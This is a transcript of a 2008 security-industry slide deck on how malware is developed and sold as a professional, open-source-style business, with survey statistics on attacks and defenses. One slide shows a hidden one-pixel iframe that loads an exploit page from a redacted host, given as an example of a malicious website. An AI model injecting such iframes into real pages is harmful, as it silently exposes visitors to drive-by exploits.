davis professional development trends within malware · title: microsoft powerpoint -...
TRANSCRIPT
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
Professional Development Trends in Malware
Michael A. DavisChief Executive Officer
Savid Technologies, Inc.
http://www.savidtech.com
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
Agenda
» Who am I?
» State of the Union
» Development Trends
» Questions
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
About Savid» Michael A. Davis - CEO
» Founded in 2003
» Chicago & DC Offices
» Think Tank of security professionals
» Diverse set of IT skill
» Unique, agile combination of expertise
» Cater to the special security needs of business
» We love what we do and will work hard to meet our
client's needs
Our focus is unique, high-end solutions. We do NOT provide “cookie-cutter” solutions because our clientele do not have “cookie-cutter” problems.
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
State of the Union» “Protection” is in place…
– 98% use firewalls
– 97% of companies protect machines with antivirus software
– 79% use anti-spyware
– 61% use email monitoring software
» But it’s not enough…
– Cost of malware: $14.2B
– 80% of companies experienced 1 or more successful attacks, 30% had more than 10
– Worldwide, 32% of companies experience attacks involving business partners
– 43% of those were infections, while 27% were unauthorized access
– 75% of enterprises will be infected with malware that evaded traditional defenses
Sources: Computer Security Institute/FBI’s 2006 Computer Crime and Security Survey, Computer Economics, 2006, ICSA Labs, 9th Annual Computer Virus Prevalence Survey, Cybertrust, Risky Business, September 2006, Gartner, Gartner’s Top Predictions for IT Organizations and Users, 2007 & Beyond, December 2006
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
The Problem - Continued
0
2000
4000
6000
8000
10000
Vulnerabilities reported
per year
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
The Threat» Highly organized crime. Their motive is Return
on Investment.
» Fraud, identity theft and extortion has been going on for centuries. Internet has made it exponentially profitable with minimal risk.
» Attacks are extremely sophisticated and one step ahead of defenses.
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
It’s a Business
"It’s very simple. We buy these products in Western countries with stolen credit cards. You don’t run any risk when purchasing these products."
Image Source: PandaSoftware at http://www.pandasoftware.com
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
The Tools» Tools are being actively sold to automate
criminal activity.
» These tools have manuals, updates, and even support.
» Price ranges from $20 - $3,000
» Russia is a breeding ground for the development and distribution.
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
Professional Interfaces
Image Source: PandaSoftware at http://www.pandasoftware.com
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
Malicious Websites
<iframe src=http://***/ex.php border=0 width=1 height=1></iframe>
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
Professional Development» Money enables quality
» Teams of developers
» Funded by investors
– Must guarantee ROI
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
Open Source Development» Different than traditional production
» Highly Distributed
» E-Mail as communication mechanism
» Various Tools
– Version Control
– Bug Tracking System – For Support
– Rudimentary Change Management
– No Project Plans
– Donated Resources/Time
– Contributors pick what they want to do
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
Multiple Contributors» Virus/Trojan written by one author
» Initial malware written by single author
» Contributors join work on bug testing
» Most malware has 2-10 authors
» Other Contributors
– Host bug system
– Host testing forum
– Donate money
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
Feature Modifications» No Project Plan
» Contributors work on what is “cool”
– Usually whatever is causing them pain
– E.g, P2P in response to botnet shutdowns
» Money
– Give priority to certain features
– Management Consoles are an example
» Malware Authors Create their own market
– Build frameworks that require customization
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
Module Reuse» Mythical Man Month states that the silver
bullet is Module Reuse
» Malware uses tons of Open Source Code
– OpenSSL
– Apache
– Pthreads
– Free Source Code
» This code has been test and is high quality
» Malware frameworks are built upon
– Variants are the problem, not new species
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
Quality Testing» Version Control enables rolling back of bad
code/branches of code
» Follows Open Source “Build/Release” test framework
» New Released are “Interrupt Driven”
– Only release new versions when the authors feel like it
» Authors hate to support their software
– Automatic update mechanisms
– Change Logs
– Documentation
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
What does this all mean?» It is all about Return on Investment (ROI)
» Malware is staying longer on workstations
» Malware is taking longer to remove
– Multiple apps/reboots/etc
» Malware is becoming more stealthy within the OS
» Malware infections are more directed and have larger impact
Copyright ©2008 Savid Technologies, Inc. All Rights Reserved
Conclusion» Thank you
» Michael A. [email protected](708) 532-2843
» Questions?